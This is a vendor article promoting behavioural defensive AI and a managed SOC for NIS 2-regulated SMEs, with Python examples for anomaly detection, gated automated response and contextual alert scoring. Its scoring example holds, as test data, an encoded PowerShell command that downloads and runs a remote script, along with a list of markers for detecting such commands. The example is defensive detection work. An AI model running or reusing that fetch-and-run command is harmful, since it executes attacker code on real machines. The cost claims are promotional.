
Cybersecurity & defensive AI

SMEs under NIS 2: defensive AI more effective and cheaper than a classic SOC

Classic antivirus, EDR and SIEM miss 0-days and attacks that abuse legitimate tools. An on-premise defensive AI that reasons on behaviour rather than signatures detects those unknown attacks, reacts in under 30 seconds and costs a fraction of a traditional SOC. Demonstrated on a concrete case, minute by minute.

Take a 250-employee SME, subject to NIS 2, with a limited cybersecurity budget. Its information system is the one most companies of that size run: Microsoft 365, Active Directory, a Fortinet or Sophos firewall, a few Windows servers, system logs. No 24/7 SOC, no SIEM at EUR 100,000 a year, no dedicated cybersecurity team.

One morning, an attacker exploits an unknown vulnerability (a 0-day) on the VPN or an exposed web application. Signature-based antivirus, EDR rules and IOC feeds see nothing: there is no signature for an attack nobody has documented yet. This is exactly the scenario traditional security is least equipped for. And it is exactly where defensive AI changes the game.

The problem: classic security looks for the known

Antivirus and EDR are excellent against what is already documented: known malware, listed indicators of compromise (IOCs), published signatures. But they struggle with everything outside that knowledge base:

  • 0-days, by definition never seen before;
  • bespoke attacks, written for a single target;
  • Living off the Land, using only legitimate tools already present (PowerShell, WMI, PsExec, scheduled tasks);
  • the diversion of perfectly normal administration tools.

The classic SIEM runs on fixed rules of the type IF event A THEN alert. The result: thousands of alerts, operational fatigue, and the real signal drowned in noise. An SME with no dedicated analyst has no chance of keeping up.

Defensive AI looks at behaviour, not signatures

The approach is radically different. The company deploys a local open-source model (Llama, Mistral or Qwen) on a GPU server, or relies on a sovereign AI hosted in Luxembourg. This AI continuously receives Active Directory, Microsoft 365, firewall and EDR logs, network flows, asset inventory, known vulnerabilities and the mapping of user rights.

It does not look for an attack signature. It builds a behavioural baseline (UEBA) for each user and each machine (typical daily volumes, usual hours, folders and hosts already touched), then detects statistically significant deviations; the language model reasons over those deviations and their context rather than computing the statistics itself. This is precisely what our AI-powered log surveillance and analysis module does: reading millions of lines, separating noise from signal, correlating events scattered across AD, EDR, network and cloud to reconstruct a full attack chain. One caveat a practitioner should keep in mind: a baseline is only as trustworthy as the period it was learned from. An account that was already compromised while its profile was built has its abuse learned as normal, so initial profiles deserve a human review.

A concrete case, minute by minute

The account j.dupont@company.com logs in from Luxembourg at 08:17. Nothing unusual.

At 08:23, the same account opens 2,500 files, runs unusual searches and accesses directories never opened before. Antivirus sees nothing. The classic SIEM raises no alert: no rule matches.

At 08:25, the AI reasons differently. This user normally opens around thirty files a day. Today: 2,500 files, access to HR resources and financial folders, at a speed incompatible with human behaviour. Probability of automation: 94%.

At 08:26, the AI observes what follows: creation of an Outlook rule, an automatic external forward, a mass SharePoint download. Taken in isolation, each event looks normal. Their combination is extremely suspicious. It is this contextual reading, not a signature list, that raises the alert.
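The detection logic of the case above, written out as an added example (this is not Luxgap's module nor any vendor's code): a per-user daily baseline with a z-score, a per-minute rate test for "speed incompatible with human behaviour", a first-seen check on sensitive folders, and a correlation step that attaches the inbox-rule and download events that follow the burst into one chain scored with a noisy-OR. The audit events, baselines, known folders, thresholds and per-signal weights are all constructed for the example; the operation names are only loosely modelled on Microsoft 365 audit operations and the address company.com is the page's own placeholder.

```python
import math
from collections import Counter
from datetime import datetime, timedelta

INTERNAL_DOMAIN = "company.com"
HUMAN_MAX_FILES_PER_MINUTE = 60          # assumed ceiling for manual browsing; tune per tenant
CHAIN_WINDOW = timedelta(minutes=15)     # how long after a burst we still attach events to it

# Constructed baseline input: file opens per day over the previous seven working days,
# and the folders each account has touched before (what "never opened before" means).
HISTORY = {
    "j.dupont@company.com": [28, 33, 27, 35, 30, 29, 31],
    "a.martin@company.com": [410, 395, 420, 405, 398, 415, 402],  # HR, habitually high volume
}
KNOWN_FOLDERS = {
    "j.dupont@company.com": {"/sites/Sales/pipeline", "/sites/Marketing/assets"},
    "a.martin@company.com": {"/sites/HR/contracts", "/sites/HR/payroll"},
}

def make_events():
    """Constructed audit events, loosely modelled on Microsoft 365 Unified Audit Log
    operation names (FileAccessed, FileDownloaded, New-InboxRule). Not a real export."""
    ev, t0 = [], datetime(2025, 3, 3, 8, 23)
    for i in range(2500):                 # 2,500 opens in about two minutes: machine speed
        folder = "/sites/HR/payroll" if i % 2 else "/sites/Finance/closing"
        ev.append({"ts": t0 + timedelta(milliseconds=50 * i), "user": "j.dupont@company.com",
                   "op": "FileAccessed", "obj": f"{folder}/doc{i}.xlsx"})
    t1 = datetime(2025, 3, 3, 8, 26)
    ev.append({"ts": t1, "user": "j.dupont@company.com", "op": "New-InboxRule",
               "obj": "ForwardTo=archive.copy@gmail.com"})        # constructed external target
    ev += [{"ts": t1 + timedelta(seconds=30 + i), "user": "j.dupont@company.com",
            "op": "FileDownloaded", "obj": f"/sites/Finance/closing/doc{i}.xlsx"} for i in range(400)]
    t2 = datetime(2025, 3, 3, 9, 0)       # the HR colleague's normal morning, about 10 files/min
    ev += [{"ts": t2 + timedelta(seconds=6 * i), "user": "a.martin@company.com",
            "op": "FileAccessed", "obj": f"/sites/HR/contracts/doc{i}.docx"} for i in range(380)]
    return ev

def baseline(samples):
    """Mean and standard deviation of a user's daily volume; std floored at 1 so a flat
    history does not turn a one-file difference into a huge z-score."""
    mean = sum(samples) / len(samples)
    var = sum((s - mean) ** 2 for s in samples) / len(samples)
    return mean, max(math.sqrt(var), 1.0)

def user_events(user, events, op=None):
    return [e for e in events if e["user"] == user and (op is None or e["op"] == op)]

def volume_zscore(user, events):
    today = len(user_events(user, events, "FileAccessed"))
    mean, std = baseline(HISTORY[user])
    return (today - mean) / std, today

def burst_start(user, events):
    """First minute in which the account opened more files than a human plausibly can,
    plus the peak per-minute count."""
    buckets = Counter(e["ts"].replace(second=0, microsecond=0)
                      for e in user_events(user, events, "FileAccessed"))
    hot = sorted(m for m, n in buckets.items() if n > HUMAN_MAX_FILES_PER_MINUTE)
    return (hot[0] if hot else None), max(buckets.values(), default=0)

def external_forward_targets(chain):
    """Inbox rules in the chain that forward mail outside the company domain."""
    targets = []
    for e in chain:
        if e["op"] in ("New-InboxRule", "Set-InboxRule") and "ForwardTo=" in e["obj"]:
            target = e["obj"].split("ForwardTo=", 1)[1]
            if not target.lower().endswith("@" + INTERNAL_DOMAIN):
                targets.append(target)
    return targets

def correlate(user, events):
    """Join the weak signals for one account into a chain and a single probability (noisy-OR).
    Only events after the burst and inside CHAIN_WINDOW are attached to the chain."""
    z, today = volume_zscore(user, events)
    start, peak = burst_start(user, events)
    chain = [e for e in user_events(user, events)
             if start is not None and start <= e["ts"] <= start + CHAIN_WINDOW]
    touched = {e["obj"].rsplit("/", 1)[0] for e in user_events(user, events, "FileAccessed")}
    new_sensitive = {f for f in touched - KNOWN_FOLDERS[user] if "/HR/" in f or "/Finance/" in f}
    forwards = external_forward_targets(chain)
    downloads = sum(1 for e in chain if e["op"] == "FileDownloaded")
    signals = {                                  # per-signal probabilities: assumed weights
        "volume_deviation": min(1 - math.exp(-max(z, 0) / 10), 0.9),
        "machine_speed": 0.9 if start is not None else 0.0,
        "first_seen_sensitive_folders": 0.5 if new_sensitive else 0.0,
        "external_forward_rule": 0.7 if forwards else 0.0,
        "mass_download_after_burst": 0.6 if downloads > 100 else 0.0,
    }
    probability = 1 - math.prod(1 - s for s in signals.values())
    return {"user": user, "files_today": today, "peak_per_minute": peak, "burst_start": start,
            "signals": signals, "forward_to": forwards, "downloads": downloads,
            "probability": round(probability, 3)}

if __name__ == "__main__":
    events = make_events()
    for user in HISTORY:
        print(correlate(user, events))
```

Run stand-alone, the script scores j.dupont above 0.99 (every signal fires inside one window) and the HR colleague at 0.0: her 380 opens are below her own baseline, at human speed, in a folder she has always used. The noisy-OR is deliberately simple; what matters is that the rule creation and the downloads only count when they follow the burst, which is the "after what" that a per-event SIEM rule never sees.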

Agentic AI: it no longer just alerts, it acts

This is where it gets interesting. An agentic AI no longer merely sends an alert nobody reads before Monday. It acts, within predefined rights. For example, above a 90% confidence level:

  • MFA token reset;
  • temporary account suspension;
  • VPN session blocking;
  • host isolation via Defender;
  • automatic incident ticket creation.

Reaction time: under 30 seconds, where human handling would take hours. The most sensitive actions remain bounded by strict thresholds and human oversight, and every decision is logged, because an autonomous defence must also be auditable. Two guard-rails matter in practice: automatic actions should be reversible and rate-limited (a model error that suspends fifty accounts in a minute is itself an incident), and privileged or break-glass accounts should never be suspended without an analyst's confirmation. Coupled with our 24/7 managed SOC, the AI handles the first reflex; the analyst takes over qualification and remediation.
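The bounded-action part, as an added example rather than Luxgap's product code: a small response engine that applies the 90% threshold from the text, tiers the five actions so that host isolation always waits for an analyst, refuses to auto-suspend a protected account, rate-limits suspensions, and writes every decision into a hash-chained audit log that can be verified later. The 60% alert threshold, the rate limit, the protected-account list, the tiering and the dry-run executor are assumptions; the executor is where real Entra ID, firewall, Defender and ticketing connectors would plug in.

```python
import hashlib
import json
from datetime import datetime, timedelta, timezone

AUTO_THRESHOLD = 0.90        # the text's bar for automatic action
ALERT_THRESHOLD = 0.60       # assumed: below this we only record the observation
MAX_AUTO_SUSPENSIONS_PER_HOUR = 5                      # assumed blast-radius guard
PROTECTED_ACCOUNTS = {"breakglass-admin@company.com"}  # assumed: never touched without a human

# The actions named in the text, tiered: reversible containment runs automatically above the
# threshold, host isolation always waits for an analyst (assumed split, not the page's).
PLAYBOOK = [
    ("reset_mfa", "auto"), ("suspend_account", "auto"), ("block_vpn_session", "auto"),
    ("isolate_host", "approval"), ("open_ticket", "auto"),
]

def dry_run_executor(action, target):
    """Placeholder for the real connectors (Entra ID, firewall, Defender, ticketing)."""
    return f"DRY-RUN {action} -> {target}"

class ResponseEngine:
    def __init__(self, executor=dry_run_executor, now=None):
        self.executor = executor
        self.now = now or (lambda: datetime.now(timezone.utc))
        self.audit = []              # hash-chained so a deleted or edited entry is detectable
        self.suspensions = []        # timestamps of automatic suspensions, for the rate limit

    def _log(self, **entry):
        prev = self.audit[-1]["hash"] if self.audit else "0" * 64
        entry.update(seq=len(self.audit), ts=self.now().isoformat(), prev=prev)
        entry["hash"] = hashlib.sha256((prev + json.dumps(entry, sort_keys=True)).encode()).hexdigest()
        self.audit.append(entry)
        return entry

    def verify_audit(self):
        """Recompute the chain; False if any entry was edited, removed or reordered."""
        prev = "0" * 64
        for e in self.audit:
            body = {k: v for k, v in e.items() if k != "hash"}
            digest = hashlib.sha256((prev + json.dumps(body, sort_keys=True)).encode()).hexdigest()
            if e["prev"] != prev or digest != e["hash"]:
                return False
            prev = e["hash"]
        return True

    def _gate(self, action, tier, finding):
        """Return None to run the action, or the reason it must wait for a human."""
        if tier == "approval":
            return "tier requires analyst approval"
        if finding["user"] in PROTECTED_ACCOUNTS and action != "open_ticket":
            return "protected account"
        if action == "suspend_account":
            cutoff = self.now() - timedelta(hours=1)
            if len([t for t in self.suspensions if t > cutoff]) >= MAX_AUTO_SUSPENSIONS_PER_HOUR:
                return "hourly suspension limit reached"
        return None

    def handle(self, finding):
        """finding: {'user', 'host', 'probability', 'signals'} from the detection stage.
        Returns {action: 'executed' | 'pending_approval'} for what was decided."""
        p, decisions = finding["probability"], {}
        if p < ALERT_THRESHOLD:
            self._log(user=finding["user"], action="observe", status="recorded", probability=p)
            return decisions
        if p < AUTO_THRESHOLD:                       # suspicious but under the bar: ticket only
            self._log(user=finding["user"], action="open_ticket", status="executed", probability=p,
                      detail=self.executor("open_ticket", finding["user"]))
            return {"open_ticket": "executed"}
        for action, tier in PLAYBOOK:
            target = finding["host"] if action == "isolate_host" else finding["user"]
            reason = self._gate(action, tier, finding)
            if reason:
                self._log(user=finding["user"], action=action, status="pending_approval",
                          reason=reason, probability=p, signals=finding["signals"])
                decisions[action] = "pending_approval"
                continue
            if action == "suspend_account":
                self.suspensions.append(self.now())
            self._log(user=finding["user"], action=action, status="executed", probability=p,
                      signals=finding["signals"], detail=self.executor(action, target))
            decisions[action] = "executed"
        return decisions

if __name__ == "__main__":
    engine = ResponseEngine()
    print(engine.handle({"user": "j.dupont@company.com", "host": "WS-042",
                         "probability": 0.96, "signals": {"machine_speed": 0.9}}))
    print("audit intact:", engine.verify_audit())
```

Every branch writes an audit entry, including the "observe" and "pending approval" cases, so the analyst who picks up the ticket sees not only what the engine did but what it chose not to do and why. The hash chain is a cheap tamper-evidence measure for a log that a court, an auditor or the ILR may one day ask for; in production it would be shipped off-host as well.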

Fewer false positives, less fatigue

The strength of reasoning is context. The same action can be perfectly normal or critical depending on who performs it, when, and after what:

  • A mass download by HR at month-end: a classic SIEM alerts, the AI understands it is normal.
  • A mass download by an accountant right after a phishing email: the AI flags it critical, like the SIEM, but explains why.
  • An administrator running PowerShell: normal for the AI, a useless alert for the SIEM.
  • An accountant running encoded PowerShell: critical, immediately.

The AI combines the usual user, business context, behavioural history, network topology, privilege level and knowledge of attack techniques to produce a probability, not yet another binary alert. The CISO receives the essentials, not a flood of logs.
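The four situations in the list above, as an added example of contextual scoring (not Luxgap's scoring code): the same action is rated from who did it, when, and what came just before, and the verdict comes with its reasons. It goes slightly beyond the list by actually decoding a PowerShell -EncodedCommand argument (base64 of UTF-16LE) and looking for a download cradle in the clear text, so an encoded command from an administrator is rated on its content rather than on the encoding alone. The directory attributes, the two-hour phishing window, the month-end definition, the 1.5x baseline ratio, the cradle markers and the sample command line (with a TEST-NET address) are all constructed assumptions.

```python
import base64
import calendar
import re
from datetime import datetime, timedelta

# Constructed directory context: department, admin flag and each person's usual daily downloads.
DIRECTORY = {
    "a.martin@company.com": {"dept": "HR", "admin": False, "daily_downloads": 300},
    "p.weber@company.com": {"dept": "Finance", "admin": False, "daily_downloads": 15},
    "it.admin@company.com": {"dept": "IT", "admin": True, "daily_downloads": 20},
}
PHISHING_WINDOW = timedelta(hours=2)   # assumed: a reported click this recent changes the reading
# Common spellings of -EncodedCommand followed by a base64 blob (not every abbreviation).
ENCODED_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
CRADLE_MARKERS = ("downloadstring", "downloadfile", "iex", "invoke-expression",
                  "frombase64string", "http")

def month_end(ts):
    """Last three calendar days of the month, the HR/finance closing window (assumed)."""
    return ts.day >= calendar.monthrange(ts.year, ts.month)[1] - 2

def decode_encoded_powershell(cmdline):
    """Return the clear-text script behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):      # binascii.Error is a ValueError
        return None

def recent_phishing(user, ts, events):
    return any(e["type"] == "phish_click" and e["user"] == user
               and timedelta(0) <= ts - e["ts"] <= PHISHING_WINDOW for e in events)

def score(event, events):
    """Rate one event using who did it, when, and what came before; return (severity, reasons)."""
    who = DIRECTORY[event["user"]]
    reasons = [f"{event['user']} ({who['dept']}{', admin' if who['admin'] else ''})"]
    if event["type"] == "mass_download":
        ratio = event["count"] / who["daily_downloads"]
        reasons.append(f"{event['count']} downloads, {ratio:.1f}x the personal baseline")
        if ratio > 1.5 and recent_phishing(event["user"], event["ts"], events):
            reasons.append("phishing click within the last two hours")
            return "critical", reasons
        if ratio <= 1.5:
            return "normal", reasons
        if who["dept"] == "HR" and month_end(event["ts"]):
            reasons.append("HR month-end cycle, volume expected")
            return "normal", reasons
        reasons.append("no business context explains the volume")
        return "medium", reasons
    if event["type"] == "powershell":
        script = decode_encoded_powershell(event["cmdline"])
        if script is None:
            if who["admin"]:
                reasons.append("plain PowerShell is routine for an administrator")
                return "normal", reasons
            reasons.append("PowerShell is unusual for this role")
            return "medium", reasons
        reasons.append(f"encoded command decodes to: {script[:60]}")
        cradle = any(k in script.lower() for k in CRADLE_MARKERS)
        if cradle or not who["admin"]:
            reasons.append("download cradle" if cradle else "encoded PowerShell from a non-admin")
            return "critical", reasons
        reasons.append("encoded but benign-looking, run by an admin")
        return "medium", reasons
    return "normal", reasons + ["event type not scored"]

def make_events():
    """Constructed events for the four situations in the text, all on a month-end day."""
    day = datetime(2025, 3, 31, 10, 0)
    cradle = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
    enc = base64.b64encode(cradle.encode("utf-16-le")).decode()
    return [
        {"type": "mass_download", "user": "a.martin@company.com", "ts": day, "count": 600},
        {"type": "phish_click", "user": "p.weber@company.com", "ts": day - timedelta(minutes=20)},
        {"type": "mass_download", "user": "p.weber@company.com", "ts": day, "count": 40},
        {"type": "powershell", "user": "it.admin@company.com", "ts": day,
         "cmdline": "powershell.exe Get-ADUser -Filter * -Properties LastLogonDate"},
        {"type": "powershell", "user": "p.weber@company.com", "ts": day,
         "cmdline": f"powershell.exe -nop -w hidden -enc {enc}"},
    ]

if __name__ == "__main__":
    evs = make_events()
    for e in evs:
        if e["type"] != "phish_click":
            print(score(e, evs))
```

The same 600 downloads by the HR account on 15 March would come back as medium with "no business context explains the volume": the verdict depends on the calendar, not on the number. The reasons list is the part the CISO actually reads; a probability without an explanation is just another alert.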

Detecting the unknown: 0-day and Living off the Land

This is probably the biggest advantage. Faced with an attack it has never seen, the AI can conclude:

I have never observed this attack, but its behaviour resembles a compromise.

Behavioural analysis catches campaigns that use only legitimate Windows tools, or techniques not yet publicly documented, where signature-based defence stays blind until the IOC is published. In a world of 0-days and automated attacks, waiting for the signature means waiting until you have already been hit.

Compensating for a limited budget

This is the heart of the matter. A complete traditional SOC assumes a SIEM, a SOAR, threat intelligence, N1, N2 and N3 analysts and 24/7 on-call. The real cost sits between EUR 150,000 and 500,000 a year, out of reach for a 250-person SME.

An on-premise defensive AI covers continuous monitoring, event correlation, alert qualification, automatic actions and incident reports with a GPU server (in the order of EUR 20,000 to 40,000 of investment), a few connectors and one engineer for governance. As a managed service, for an SME of this size, that means a few thousand euros a month, a fraction of an internal SOC, for superior coverage on unknown attacks. Cheaper, and more effective precisely where classic security is blind.

A strategic advantage, not just a saving

The attacker already uses AI: flawlessly written phishing, automatic vulnerability discovery, malware generation, full attack automation. Tomorrow, the most effective defence will no longer be more rules, but an autonomous defensive AI able to reason faster than the attacker.

The model shifts: the company no longer tries to prevent every vulnerability, which is impossible, but to have an AI able to observe, understand and react in real time to behaviours never seen before.

What about compliance? NIS 2 and DORA point this way

This vision aligns very well with the early-detection, continuous-monitoring and incident-response requirements set out by NIS 2 (Directive (EU) 2022/2555, Article 21 on risk-management measures, Article 23 on incident notification: an early warning within 24 hours and an incident notification within 72 hours to the competent authority, the ILR in Luxembourg, followed by a final report). For the financial sector only, DORA (Regulation (EU) 2022/2554) imposes the same ICT operational resilience logic. AI does not replace mandatory security measures: it becomes a powerful resilience layer when integrated into a defence-in-depth architecture. And because logs contain sensitive data, hosting stays in Luxembourg, data does not leave the territory (GDPR, banking secrecy), and a fully on-premise option exists.

How Luxgap delivers it

Luxgap brings lawyers, cyber engineers and developers together in the same team, and operates a sovereign AI in Luxembourg. Concretely, for an SME subject to NIS 2:

  • our AI log surveillance and analysis module ingests your sources (AD, M365, firewall, EDR, cloud), builds the behavioural baseline and qualifies incidents;
  • it feeds our 24/7 managed SOC and pre-fills NIS 2 and DORA notification forms;
  • the AI can run on EU sovereign cloud or fully on-premise at your site, depending on your sensitivity level.

Are you an executive, CIO or CISO of an organisation subject to NIS 2 whose budget does not allow a classic SOC? That is exactly the case we handle. Let's talk, or configure a tailored quote in a few minutes.
